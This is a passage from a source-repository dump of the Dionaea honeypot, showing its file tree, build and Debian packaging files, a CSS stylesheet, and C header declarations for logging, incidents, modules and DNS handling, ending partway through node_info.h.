├── .gitignore ├── LICENSE ├── Makefile.am ├── README ├── conf └── dionaea.conf.dist ├── configure.ac ├── debian ├── changelog ├── compat ├── control └── rules ├── doc └── html │ ├── index.html │ └── screen.css ├── include ├── Makefile.am ├── bistream.h ├── connection.h ├── dionaea.h ├── dns.h ├── incident.h ├── log.h ├── modules.h ├── node_info.h ├── pchild.h ├── processor.h ├── protocol.h ├── refcount.h ├── signals.h ├── threads.h └── util.h ├── m4 ├── az_bind_ipv4_mapped_localhost.m4 └── az_python.m4 ├── modules ├── Makefile.am ├── curl │ ├── Makefile.am │ ├── module.c │ └── module.h ├── emu │ ├── Makefile.am │ ├── detect.c │ ├── emulate.c │ ├── hooks.c │ ├── module.c │ ├── module.h │ └── profile.c ├── nc │ ├── Makefile.am │ ├── nc.c │ └── nc.h ├── nfq │ ├── Makefile.am │ └── nfq.c ├── nl │ ├── Makefile.am │ └── module.c ├── pcap │ ├── Makefile.am │ └── pcap.c ├── python │ ├── Makefile.am │ ├── binding.pyx │ ├── module.c │ ├── module.h │ ├── pyev │ │ ├── Async.c │ │ ├── Check.c │ │ ├── Child.c │ │ ├── Embed.c │ │ ├── Fork.c │ │ ├── Idle.c │ │ ├── Io.c │ │ ├── Loop.c │ │ ├── Periodic.c │ │ ├── PeriodicBase.c │ │ ├── Prepare.c │ │ ├── Scheduler.c │ │ ├── Signal.c │ │ ├── Stat.c │ │ ├── Timer.c │ │ ├── Watcher.c │ │ ├── pyev.c │ │ └── pyev.h │ ├── scripts │ │ ├── Makefile.am │ │ ├── __init__.py │ │ ├── cmd.py │ │ ├── echo.py │ │ ├── emu.py │ │ ├── fail2ban.py │ │ ├── ftp.py │ │ ├── hpfeeds.py │ │ ├── http.py │ │ ├── ihandlers.py │ │ ├── log.py │ │ ├── logsql.py │ │ ├── logxmpp.py │ │ ├── mirror.py │ │ ├── mqtt │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ └── packets.py │ │ │ └── mqtt.py │ │ ├── mssql │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ └── tds.py │ │ │ └── mssql.py │ │ ├── mwserv.py │ │ ├── mysql │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ ├── fields.py │ │ │ │ ├── packets.py │ │ │ │ └── packets.py_ │ │ │ └── mysql.py │ │ ├── ndrlib.py │ │ ├── nfq.py │ │ ├── p0f.py │ │ ├── pptp │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ └── packets.py │ │ │ └── pptp.py │ │ ├── services.py │ │ ├── sip │ │ │ ├── __init__.py │ │ │ ├── extras.py │ │ │ ├── rfc2396.py │ │ │ ├── rfc2617.py │ │ │ ├── rfc3261.py │ │ │ └── rfc4566.py │ │ ├── smb │ │ │ ├── __init__.py │ │ │ ├── include │ │ │ │ ├── __init__.py │ │ │ │ ├── asn1 │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── asn1.py │ │ │ │ │ ├── ber.py │ │ │ │ │ └── mib.py │ │ │ │ ├── asn1fields.py │ │ │ │ ├── asn1packet.py │ │ │ │ ├── fieldtypes.py │ │ │ │ ├── gssapifields.py │ │ │ │ ├── helpers.py │ │ │ │ ├── ntlmfields.py │ │ │ │ ├── packet.py │ │ │ │ └── smbfields.py │ │ │ ├── rpcservices.py │ │ │ └── smb.py │ │ ├── store.py │ │ ├── submit_http.py │ │ ├── surfids.py │ │ ├── test.py │ │ ├── tftp.py │ │ ├── upnp │ │ │ ├── __init__.py │ │ │ └── upnp.py │ │ ├── util.py │ │ └── virustotal.py │ ├── setup.py.in │ └── util │ │ ├── Makefile.am │ │ ├── csv2sqlite.py │ │ ├── gnuplotsql.py │ │ ├── gnuplotsql │ │ ├── gnuplot.example │ │ └── gnuplot.svg.example │ │ ├── logsql2postgres.py │ │ ├── readlogsqltree.py │ │ ├── retry.py │ │ ├── updateccs.py │ │ └── xmpp │ │ ├── pg_backend.py │ │ └── pg_schema.sql └── xmatch │ ├── Makefile.am │ ├── module.c │ ├── module.h │ └── xmatch.c ├── src ├── LICENSE.openssl ├── Makefile.am ├── bistream.c ├── connection.c ├── dionaea.c ├── dns.c ├── incident.c ├── log.c ├── modules.c ├── node_info.c ├── pchild.c ├── processor.c ├── refcount.c ├── signals.c ├── threads.c └── util.c └── tests ├── sip ├── README ├── functional-test-sip.py ├── run-bt4.sh ├── run-bt5.sh ├── run-tests.sh └── sipp │ ├── error_sdp.xml │ ├── newmethod.xml │ ├── options.xml │ ├── register.xml │ ├── register_pw.xml │ ├── uac.xml │ ├── user.csv │ └── user_pw.csv └── smb └── metasploit.rc /.gitignore: -------------------------------------------------------------------------------- 1 | # intermediate object files 2 | *.o 3 | *.lo 4 | *.la 5 | 6 | # automake 7 | Makefile 8 | Makefile.in 9 | .deps 10 | .libs 11 | config.* 12 | aclocal.m4 13 | autom4te.cache/ 14 | configure 15 | depcomp 16 | install-sh 17 | libtool 18 | ltmain.sh 19 | missing 20 | stamp-h1 21 | 22 | # slickedit 23 | *.vpj 24 | *.vpw 25 | *.vpwhistu 26 | *.vtg 27 | 28 | # project specific 29 | src/dionaea 30 | modules/python/binding.c 31 | modules/python/build/ 32 | modules/python/setup.py 33 | 34 | *.pyc 35 | -------------------------------------------------------------------------------- /Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | SUBDIRS = src include modules 6 | 7 | EXTRA_DIST = configure.ac conf/dionaea.conf.dist 8 | 9 | install-data-local: 10 | $(mkinstalldirs) $(DESTDIR)$(sysconfdir) 11 | $(mkinstalldirs) $(DESTDIR)$(sysconfdir)/dionaea 12 | $(mkinstalldirs) $(DESTDIR)$(localstatedir) 13 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/run/ 14 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/ 15 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/binaries/ 16 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/bistreams/ 17 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/dionaea/wwwroot/ 18 | $(INSTALL_DATA) $(srcdir)/conf/dionaea.conf.dist $(DESTDIR)$(sysconfdir)/dionaea/dionaea.conf.dist; 19 | if [ ! -e $(DESTDIR)$(sysconfdir)/dionaea/dionaea.conf ]; then \ 20 | $(INSTALL_DATA) $(srcdir)/conf/dionaea.conf.dist $(DESTDIR)$(sysconfdir)/dionaea/dionaea.conf; \ 21 | fi 22 | $(mkinstalldirs) $(DESTDIR)$(localstatedir)/log 23 | 24 | 25 | -------------------------------------------------------------------------------- /debian/changelog: -------------------------------------------------------------------------------- 1 | dionaea (0.1.0) lenny; urgency=low 2 | 3 | * Initial release 4 | 5 | -- kees Wed, 3 Mar 2010 16:50:17 +0100 6 | -------------------------------------------------------------------------------- /debian/compat: -------------------------------------------------------------------------------- 1 | 5 2 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: dionaea 2 | Section: misc 3 | Priority: optional 4 | Maintainer: 5 | Standards-Version: 3.7.2 6 | Build-Depends: debhelper (>= 5), pkg-config (>=0.22), libglib2.0-dev (>= 2.22.2), libcurl4-openssl-dev (>= 7.19.5), python3.2-dev (>= 3.2), cython (>= 0.14.2), libudns-dev (>= 0.0.9), libssl-dev (>= 0.9.8g), liblcfg (>= 0.2.0), libemu (>= 0.2.0), libev-dev (>= 4.0) 7 | 8 | Package: dionaea 9 | Architecture: i386 amd64 10 | Priority: optional 11 | Depends: libglib2.0-0 (>= 2.22.2), libcurl3 (>= 7.19.5), libpython3.2 (>= 3.2), libudns0 (>= 0.0.9), libssl0.9.8 (>= 0.9.8g), liblcfg (>= 0.2.0), libemu (>= 0.2.0), libev3 (>= 4.0) 12 | Description: dionaea 13 | Dionaea is meant to be a Nepenthes successor, embedding Python 14 | as scripting language, using libemu to detect 15 | shellcodes, supporting IPv6 and TLS. 16 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | package = dionaea 4 | 5 | CC = gcc 6 | #CFLAGS = -g -Wall 7 | #CFLAGS = -Werror 8 | 9 | #ifeq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) 10 | # CFLAGS += -O2 11 | #endif 12 | 13 | #export DH_VERBOSE=1 14 | 15 | clean: 16 | rm -f build-stamp 17 | if [ -f Makefile ]; then $(MAKE) clean distclean; fi 18 | rm -f debian/*README.Debian 19 | dh_clean 20 | 21 | config.h: clean 22 | dh_testdir 23 | dh_auto_configure 24 | 25 | build: build-stamp 26 | 27 | build-stamp: config.h 28 | dh_auto_build 29 | touch $@ 30 | 31 | 32 | install: build 33 | dh_testdir 34 | dh_testroot 35 | dh_installdirs 36 | dh_auto_install 37 | rm $(CURDIR)/debian/dionaea/usr/lib/dionaea/python/dionaea/core.so 38 | dh_link usr/lib/dionaea/python.so usr/lib/dionaea/python/dionaea/core.so 39 | dh_link usr/lib/dionaea/python.so usr/lib/dionaea/python/dionaea/pyev.so 40 | 41 | binary-indep: install 42 | # There are no architecture-independent files to be uploaded 43 | # generated by this package. If there were any they would be 44 | # made here. 45 | 46 | binary-arch: install 47 | dh_testdir -a 48 | dh_testroot -a 49 | # dh_installdocs -a NEWS 50 | # dh_installchangelogs -a ChangeLog 51 | dh_strip -a 52 | dh_compress -a 53 | dh_fixperms -a 54 | dh_installdeb -a 55 | dh_shlibdeps -a 56 | dh_gencontrol -a 57 | dh_md5sums -a 58 | dh_builddeb -a 59 | 60 | binary: binary-indep binary-arch 61 | 62 | .PHONY: binary binary-arch binary-indep clean checkroot 63 | -------------------------------------------------------------------------------- /doc/html/screen.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: auto; 3 | width: 50em; 4 | font-family: "Verdana"; 5 | line-height: 140%; 6 | } 7 | 8 | h2 { 9 | font-variant: small-caps; 10 | border-bottom: 1px solid #888; 11 | color: #333; 12 | } 13 | 14 | a { 15 | color: #7ea419; 16 | text-decoration: none; 17 | border-bottom: 1px solid black; 18 | } 19 | 20 | a:hover { 21 | background-color: #fffdf1; 22 | border-bottom: 1px solid #2cbd44; 23 | } 24 | 25 | pre, kbd { 26 | color: #6e009e; 27 | } 28 | 29 | pre { 30 | margin-left: 3em; 31 | line-height: 1.2em; 32 | overflow:auto; 33 | } 34 | 35 | code { 36 | margin-left: 3em; 37 | color: #33a19e; 38 | white-space: wrap; 39 | } 40 | 41 | ul { 42 | list-style-type: square; 43 | } 44 | 45 | p, dl, ul { 46 | margin-left: 1em; 47 | } 48 | 49 | dt { 50 | font-weight: bold; 51 | } 52 | 53 | dl.faq dt:before { 54 | content: "Q: "; 55 | } 56 | 57 | dl.faq dt { 58 | margin-top: 1em; 59 | } 60 | 61 | dl.faq dd:before { 62 | content: "A: "; 63 | font-weight: bold; 64 | } 65 | 66 | #header { 67 | background-color: #7ea419; 68 | padding: 1em; 69 | } 70 | 71 | #header h1, #header h3 { 72 | color: white; 73 | margin: 0; 74 | } 75 | 76 | h1 {font-size: 160%; margin-left: 0px; font-weight: bold;} 77 | h2 {font-size: 150%; margin-left: 10px;} 78 | h3 {font-size: 140%; margin-left: 20px; border-bottom: none; font-weight: bold;} 79 | h4 {font-size: 120%; margin-left: 30px; border-bottom: none; font-weight: bold;} 80 | h5 {font-size: 100%; margin-left: 40px; border-bottom: none; font-weight: bold;} 81 | 82 | 83 | div.level1 {margin-left: 3px;} 84 | div.level2 {margin-left: 13px;} 85 | div.level3 {margin-left: 23px;} 86 | div.level4 {margin-left: 33px;} 87 | div.level5 {margin-left: 43px;} 88 | 89 | 90 | #nav { 91 | float: left; 92 | list-style-type: none; 93 | padding: 0; 94 | } 95 | 96 | #nav li a { 97 | border: none; 98 | font-weight: bold; 99 | text-decoration: none; 100 | color: black; 101 | padding: 3px 10px 3px 10px; 102 | } 103 | 104 | #content { 105 | background-color: white; 106 | color: black; 107 | padding: 2em; 108 | border-left: 4px solid #ddd; 109 | border-right: 4px solid #ddd; 110 | } 111 | 112 | #about { 113 | font-style: italic; 114 | float: left; 115 | width: 50%; 116 | } 117 | 118 | #separator { 119 | clear: left; 120 | visibility: hidden; 121 | padding-top: 1em; 122 | } 123 | -------------------------------------------------------------------------------- /include/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | includedir = $(prefix)/include/dionaea 6 | 7 | noinst_HEADERS = dionaea.h 8 | noinst_HEADERS += dns.h 9 | noinst_HEADERS += refcount.h 10 | noinst_HEADERS += node_info.h 11 | noinst_HEADERS += util.h 12 | noinst_HEADERS += log.h 13 | noinst_HEADERS += protocol.h 14 | noinst_HEADERS += modules.h 15 | noinst_HEADERS += connection.h 16 | noinst_HEADERS += pchild.h 17 | noinst_HEADERS += signals.h 18 | noinst_HEADERS += incident.h 19 | noinst_HEADERS += threads.h 20 | noinst_HEADERS += bistream.h 21 | noinst_HEADERS += processor.h 22 | 23 | 24 | -------------------------------------------------------------------------------- /include/bistream.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_BISTEAM_H 29 | #define HAVE_BISTEAM_H 30 | 31 | #include 32 | #include 33 | 34 | 35 | enum bistream_direction 36 | { 37 | bistream_in, 38 | bistream_out 39 | }; 40 | 41 | struct stream_chunk 42 | { 43 | GString *data; 44 | uint32_t bistream_offset; 45 | uint32_t stream_offset; 46 | enum bistream_direction direction; 47 | }; 48 | 49 | struct bistream 50 | { 51 | GList *stream_sequence; 52 | GMutex *mutex; 53 | 54 | struct stream 55 | { 56 | GList *stream_chunks; 57 | GMutex *mutex; 58 | }streams[2]; 59 | }; 60 | 61 | uint32_t sizeof_stream_chunks(GList *stream_chunks); 62 | 63 | struct bistream *bistream_new(void); 64 | void bistream_free(struct bistream *bs); 65 | 66 | void bistream_data_add(struct bistream *bs, enum bistream_direction, void *data, uint32_t size); 67 | void bistream_debug(struct bistream *bs); 68 | 69 | int32_t bistream_get_stream(struct bistream *bs, enum bistream_direction dir, uint32_t start, int32_t end, void **data); 70 | 71 | void print_stream_chunk(struct stream_chunk *sc); 72 | void print_stream_chunk2(struct stream_chunk *sc); 73 | 74 | #endif 75 | -------------------------------------------------------------------------------- /include/dionaea.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_DIONAEA_H 29 | #define HAVE_DIONAEA_H 30 | 31 | struct lcfg; 32 | struct lcfgx_tree_node; 33 | 34 | struct dns; 35 | struct modules; 36 | struct pchild; 37 | struct logging; 38 | struct ihandlers; 39 | struct threads; 40 | 41 | struct version 42 | { 43 | struct 44 | { 45 | char *version; 46 | } dionaea; 47 | struct 48 | { 49 | char *os; 50 | char *arch; 51 | char *date; 52 | char *time; 53 | char *name; 54 | char *version; 55 | } compiler; 56 | struct 57 | { 58 | char *node; 59 | char *sys; 60 | char *machine; 61 | char *release; 62 | } info; 63 | }; 64 | 65 | 66 | struct dionaea 67 | { 68 | struct 69 | { 70 | struct lcfg *config; 71 | struct lcfgx_tree_node *root; 72 | char *name; 73 | } config; 74 | 75 | struct 76 | { 77 | int fds; 78 | } limits; 79 | 80 | struct version *version; 81 | 82 | struct dns *dns; 83 | 84 | struct ev_loop *loop; 85 | 86 | struct modules *modules; 87 | 88 | struct pchild *pchild; 89 | 90 | struct logging *logging; 91 | 92 | struct signals *signals; 93 | 94 | struct ihandlers *ihandlers; 95 | 96 | struct threads *threads; 97 | 98 | struct processors *processors; 99 | }; 100 | 101 | 102 | 103 | extern struct dionaea *g_dionaea; 104 | 105 | 106 | 107 | #endif 108 | -------------------------------------------------------------------------------- /include/dns.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | 30 | struct dns_ctx; 31 | 32 | struct dns 33 | { 34 | struct dns_ctx *dns; 35 | struct ev_timer dns_timeout; 36 | struct ev_io io_in; 37 | int socket; 38 | }; 39 | 40 | void udns_io_in_cb(EV_P_ struct ev_io *w, int revents); 41 | void udns_timeout_cb(EV_P_ struct ev_timer *w, int revents); 42 | void udns_set_timeout_cb(struct dns_ctx *ctx, int timeout, void *data); 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /include/incident.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | 32 | struct incident; 33 | 34 | struct ihandlers 35 | { 36 | GList *handlers; 37 | }; 38 | 39 | 40 | typedef void (*ihandler_cb)(struct incident *i, void *ctx); 41 | struct ihandler 42 | { 43 | const char *path; 44 | GPatternSpec *match; 45 | ihandler_cb cb; 46 | void *ctx; 47 | }; 48 | 49 | struct ihandler *ihandler_new(char *pattern, ihandler_cb cb, void *ctx); 50 | void ihandler_free(struct ihandler *i); 51 | 52 | enum opaque_data_type 53 | { 54 | opaque_type_none, 55 | opaque_type_string, 56 | opaque_type_int, 57 | opaque_type_ptr, 58 | opaque_type_list, 59 | opaque_type_dict 60 | }; 61 | 62 | struct connection; 63 | 64 | struct opaque_data 65 | { 66 | enum opaque_data_type type; 67 | char *name; 68 | union 69 | { 70 | GString *string; 71 | long int integer; 72 | uintptr_t ptr; 73 | struct connection *con; 74 | GList *list; 75 | GHashTable *dict; 76 | }opaque; 77 | }; 78 | struct opaque_data *opaque_data_new(void); 79 | void opaque_data_free(struct opaque_data *d); 80 | void opaque_data_string_set(struct opaque_data *d, GString *val); 81 | void opaque_data_string_get(struct opaque_data *d, GString **val); 82 | void opaque_data_int_set(struct opaque_data *d, long int val); 83 | void opaque_data_int_get(struct opaque_data *d, long int *val); 84 | void opaque_data_con_set(struct opaque_data *d, struct connection *val); 85 | void opaque_data_con_get(struct opaque_data *d, struct connection **val); 86 | void opaque_data_list_set(struct opaque_data *d, GList *val); 87 | void opaque_data_list_get(struct opaque_data *d, GList **val); 88 | void opaque_data_dict_set(struct opaque_data *d, GHashTable *val); 89 | void opaque_data_dict_get(struct opaque_data *d, GHashTable **val); 90 | void opaque_data_none_set(struct opaque_data *d); 91 | void opaque_data_none_get(struct opaque_data *d); 92 | 93 | struct incident 94 | { 95 | char *origin; 96 | GHashTable *data; 97 | }; 98 | 99 | 100 | 101 | struct incident *incident_new(const char *origin); 102 | void incident_free(struct incident *e); 103 | bool incident_value_int_set(struct incident *e, const char *name, long int val); 104 | bool incident_value_int_get(struct incident *e, const char *name, long int *val); 105 | bool incident_value_con_set(struct incident *e, const char *name, struct connection *val); 106 | bool incident_value_con_get(struct incident *e, const char *name, struct connection **val); 107 | bool incident_value_string_set(struct incident *e, const char *name, GString *str); 108 | bool incident_value_string_get(struct incident *e, const char *name, GString **str); 109 | bool incident_value_list_set(struct incident *e, const char *name, GList *list); 110 | bool incident_value_list_get(struct incident *e, const char *name, GList **list); 111 | bool incident_value_dict_set(struct incident *e, const char *name, GHashTable *val); 112 | bool incident_value_dict_get(struct incident *e, const char *name, GHashTable **val); 113 | bool incident_value_none_set(struct incident *e, const char *name); 114 | bool incident_value_none_get(struct incident *e, const char *name); 115 | 116 | void incident_dump(struct incident *e); 117 | 118 | bool incident_keys_get(struct incident *e, char ***keys); 119 | void incident_report(struct incident *i); 120 | 121 | /* 122 | struct incident *e = incident_new("test"); 123 | incident_value_int_set(e, "int_test", 4711); 124 | incident_value_string_set(e, "string_test", g_string_new("4711")); 125 | incident_value_con_set(e, "ptr_test", 0x4711); 126 | incident_dump(e); 127 | incident_report(e); 128 | incident_free(e) 129 | */ 130 | 131 | -------------------------------------------------------------------------------- /include/log.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | #include "config.h" 32 | 33 | #define STRINGIFY(x) #x 34 | #define TOSTRING(x) STRINGIFY(x) 35 | #define AT __FILE__ ":" TOSTRING(__LINE__) 36 | 37 | #ifdef G_LOG_DOMAIN 38 | #undef G_LOG_DOMAIN 39 | #ifdef DEBUG 40 | #define G_LOG_DOMAIN D_LOG_DOMAIN " " AT 41 | #else 42 | #define G_LOG_DOMAIN D_LOG_DOMAIN 43 | #endif /* DEBUG */ 44 | #endif 45 | 46 | 47 | #define g_info(...) g_log(G_LOG_DOMAIN, G_LOG_LEVEL_INFO, __VA_ARGS__) 48 | 49 | #ifdef NDEBUG 50 | #undef g_debug 51 | #define g_debug(...) 52 | #endif 53 | 54 | #ifdef PERFORMANCE 55 | #undef g_info 56 | #define g_info(...) 57 | #undef g_message 58 | #define g_message(...) 59 | #undef g_warning 60 | #define g_warning(...) 61 | #endif 62 | 63 | 64 | struct logging 65 | { 66 | GMutex *lock; 67 | GList *loggers; 68 | }; 69 | 70 | struct log_level_map 71 | { 72 | const char *name; 73 | int mask; 74 | }; 75 | 76 | struct domain_filter 77 | { 78 | char *domain; 79 | GPatternSpec *pattern; 80 | }; 81 | 82 | struct log_filter 83 | { 84 | struct domain_filter **domains; 85 | int mask; 86 | }; 87 | struct log_filter *log_filter_new(const char *domains, const char *levels); 88 | bool log_filter_match(struct log_filter *filter, const char *log_domain, int log_level); 89 | 90 | extern struct log_level_map log_level_mapping[]; 91 | 92 | struct logger; 93 | typedef bool (*log_util_fn)(struct logger *, void *data); 94 | struct logger 95 | { 96 | log_util_fn open; 97 | log_util_fn close; 98 | log_util_fn hup; 99 | log_util_fn flush; 100 | GLogFunc log; 101 | int fd; 102 | void *data; 103 | }; 104 | struct logger *logger_new(GLogFunc log, log_util_fn xopen, log_util_fn hup, log_util_fn xclose, log_util_fn xflush, void *data); 105 | 106 | 107 | void log_multiplexer(const gchar *log_domain, 108 | GLogLevelFlags log_level, 109 | const gchar *message, 110 | gpointer user_data); 111 | 112 | 113 | struct logger_file_data 114 | { 115 | char file[PATH_MAX+1]; 116 | FILE *f; 117 | struct log_filter *filter; 118 | }; 119 | 120 | void logger_file_log(const gchar *log_domain, 121 | GLogLevelFlags log_level, 122 | const gchar *message, 123 | gpointer user_data); 124 | bool logger_file_open(struct logger *l, void *data); 125 | bool logger_file_close(struct logger *l, void *data); 126 | bool logger_file_hup(struct logger *l, void *data); 127 | 128 | 129 | bool logger_stdout_open(struct logger *l, void *data); 130 | void logger_stdout_log(const gchar *log_domain, 131 | GLogLevelFlags log_level, 132 | const gchar *message, 133 | gpointer user_data); 134 | bool logger_file_flush(struct logger *l, void *data); 135 | 136 | -------------------------------------------------------------------------------- /include/modules.h: -------------------------------------------------------------------------------- 1 | #ifndef HAVE_MODULES_H 2 | #define HAVE_MODULES_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | 11 | struct dionaea; 12 | 13 | struct module; 14 | 15 | 16 | 17 | typedef struct module_api *(*module_init_function)(struct dionaea *d); 18 | 19 | typedef bool (*module_config_function)(struct lcfgx_tree_node *node); 20 | typedef bool (*module_start_function)(void); 21 | typedef bool (*module_new_function)(struct dionaea *d); 22 | typedef bool (*module_free_function)(void); 23 | 24 | /** 25 | * this is the api to interact with modules 26 | * startup order is 27 | * * config 28 | * * prepare 29 | * * new 30 | * after prepare privs are dropped 31 | * 32 | * hup is meant to support SIGHUP in modules 33 | * 34 | * shutdown order 35 | * * free 36 | */ 37 | struct module_api 38 | { 39 | module_config_function config; 40 | module_start_function start; 41 | module_start_function prepare; 42 | module_new_function new; 43 | module_free_function free; 44 | module_config_function hup; 45 | }; 46 | 47 | struct module 48 | { 49 | char *name; 50 | GModule *module; 51 | module_init_function module_init; 52 | struct lcfgx_tree_node *config; 53 | struct module_api api; 54 | }; 55 | 56 | struct module *module_new(const char *name, const char *path); 57 | void module_free(struct module *module); 58 | 59 | 60 | struct modules 61 | { 62 | GList *modules; 63 | }; 64 | 65 | 66 | void modules_load(struct lcfgx_tree_node *node); 67 | void modules_unload(void); 68 | 69 | /** 70 | * module bootstrapping order 71 | * 72 | * config: ... 73 | * 74 | * prepare: initialize shared memory for pchild (if required) 75 | * 76 | * ->fork pchild 77 | * 78 | * new: bind & do things 79 | * 80 | * drop privs & chroot 81 | * 82 | * start: run in your chroot, open db handles 83 | */ 84 | 85 | 86 | 87 | void modules_config(void); 88 | void modules_prepare(void); 89 | void modules_new(void); 90 | void modules_start(void); 91 | void modules_free(void); 92 | void modules_hup(void); 93 | 94 | #endif 95 | -------------------------------------------------------------------------------- /include/node_info.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | 32 | #define PORT_STRLEN 6 33 | #define IFNAM_STRLEN 16 34 | #define INET_STRLEN INET6_ADDRSTRLEN 35 | 36 | #define NODE_STRLEN 1 + INET_STRLEN + 1 + 1 + IFNAM_STRLEN + 1 + 1 + PORT_STRLEN 37 | 38 | struct node_info 39 